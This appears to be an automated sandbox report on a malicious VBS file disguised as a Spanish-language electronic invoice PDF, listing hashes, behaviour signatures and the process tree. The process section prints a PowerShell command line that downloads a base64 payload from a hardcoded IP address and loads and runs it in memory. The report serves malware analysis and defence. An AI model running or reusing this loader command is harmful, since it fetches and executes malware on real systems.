Analysis
max time kernel: 41s
max time network: 44s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 08-10-2022 08:19

Static task: static1
Behavioral task: behavioral1
Sample: Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
Resource: win7-20220812-en
General
Target: Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs
Size: 442KB
MD5: 62174dd3cc316dff4896b292cde3eebc
SHA1: abc441c9636e64ff3c6a24879efc6c847640adfa
SHA256: 1add10f411596ce592775736cbd547b0de4e69ae044173cb604bc1cb410dc424
SHA512: ec4d0dd87b74e8ae268d9cea674a75920b0935095c975db0f3609af176ee3392801ec9d12ad0705964fd4491bc5b05ac6f089b7b34690a64923b5fb5c098e7f3
SSDEEP: 768:De0E0B0S0Y0V0w0B0V0/i0j0+050kfF0NF0B0Z/0pP40E0X070M0Ao0O0gAOAqAn:7aW1AP4HgK

Malware Config
Extracted: http://20.7.14.99/dll/dll_ink.pdf
Signatures

Blocklisted process makes network request (1 IoCs)
Processes:
  flow  pid   process
  3     1160  powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes:
  pid   process
  1160  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1160  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                       pid   process      target process
  PID 1424 wrote to memory of 1160  1424  WScript.exe  powershell.exe
  PID 1424 wrote to memory of 1160  1424  WScript.exe  powershell.exe
  PID 1424 wrote to memory of 1160  1424  WScript.exe  powershell.exe
Processes

[1] C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fact_Elect_En_Mora_No. 01_0710-PASS_6010_CUFE-7IZG026010_PDF.vbs"
    - Suspicious use of WriteProcessMemory

[2] (child of [1]) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/9EUiS/d/ee.etsap//:sptth'))
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/1160-55-0x0000000000000000-mapping.dmp
memory/1160-57-0x000007FEF3990000-0x000007FEF43B3000-memory.dmp  Filesize: 10.1MB
memory/1160-59-0x0000000002614000-0x0000000002617000-memory.dmp  Filesize: 12KB
memory/1160-58-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp  Filesize: 11.4MB
memory/1160-60-0x000000000261B000-0x000000000263A000-memory.dmp  Filesize: 124KB
memory/1160-61-0x0000000002614000-0x0000000002617000-memory.dmp  Filesize: 12KB
memory/1160-62-0x000000000261B000-0x000000000263A000-memory.dmp  Filesize: 124KB
memory/1424-54-0x000007FEFBD11000-0x000007FEFBD13000-memory.dmp  Filesize: 8KB